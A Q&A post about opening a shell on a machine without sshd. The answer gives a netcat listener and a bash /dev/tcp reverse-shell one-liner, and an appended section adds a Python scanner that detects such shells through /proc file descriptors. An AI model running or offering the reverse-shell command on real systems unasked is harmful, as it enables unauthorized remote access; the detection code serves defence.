How to open a shell without SSHD on the receiving

Published 2019-05-31 02:53

Question:

I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).

Since I have SSH on my limited machine, I configured a reverse proxy:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

Now I have a connection on port 19999 from my "fully controlled" machine to my "limited" machine. How would I open a shell with this setup?

Answer 1:

You can pipe the input from some port directly to bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:

nc -lvp 9999

And on the limited machine:

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

where 192.168.122.1 is the IP of the full-control machine.

This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar to what you propose above).
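
A detection-side counterpart to the answer above, added here and not part of the original post: the `bash -i >& /dev/tcp/... 0>&1` redirection leaves a shell process whose descriptors 0, 1 and 2 all resolve to the same `socket:[inode]` in `/proc/<pid>/fd`, whereas a shell behind sshd or a terminal sits on a pty. The scanner below looks for exactly that; the sample process table, pids and inode numbers are constructed.

```python
"""Flag shells whose stdin and stdout are the same socket (reverse-shell footprint)."""
import os
import re

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


def classify(comm, fds):
    """Return the socket inode when fds 0 and 1 of a shell are one socket, else None.
    `fds` maps an fd number to the readlink target of /proc/<pid>/fd/<n>."""
    if comm not in SHELLS:
        return None
    m0 = SOCKET_RE.match(fds.get(0, ""))
    m1 = SOCKET_RE.match(fds.get(1, ""))
    if m0 and m1 and m0.group(1) == m1.group(1):
        return m0.group(1)
    return None


def find_socket_shells(table):
    """table: {pid: (comm, {fd: target})}. Returns sorted [(pid, comm, inode)]."""
    hits = []
    for pid, (comm, fds) in sorted(table.items()):
        inode = classify(comm, fds)
        if inode is not None:
            hits.append((pid, comm, inode))
    return hits


def read_proc():
    """Build the table from a live Linux /proc (root needed to see other users' fds)."""
    table = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"/proc/{entry}/fd"
            fds = {int(n): os.readlink(os.path.join(fd_dir, n)) for n in os.listdir(fd_dir)}
        except OSError:
            continue  # process exited or permission denied; skip it
        table[int(entry)] = (comm, fds)
    return table


# Constructed sample: 1234 is a normal bash on a pty, 4242 is the /dev/tcp shell
# from the answer, 4300 is a non-shell network program and must not be flagged.
SAMPLE = {
    1234: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    4242: ("bash", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}),
    4300: ("python3", {0: "socket:[11111]", 1: "socket:[11111]"}),
}

if __name__ == "__main__":
    table = read_proc() if os.path.isdir("/proc") else SAMPLE
    for pid, comm, inode in find_socket_shells(table):
        print(f"pid {pid} ({comm}) has its stdio on socket inode {inode}")
```

On a host without `/proc` the script falls back to the constructed sample so the logic can still be exercised.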



Tags: shell ssh sshd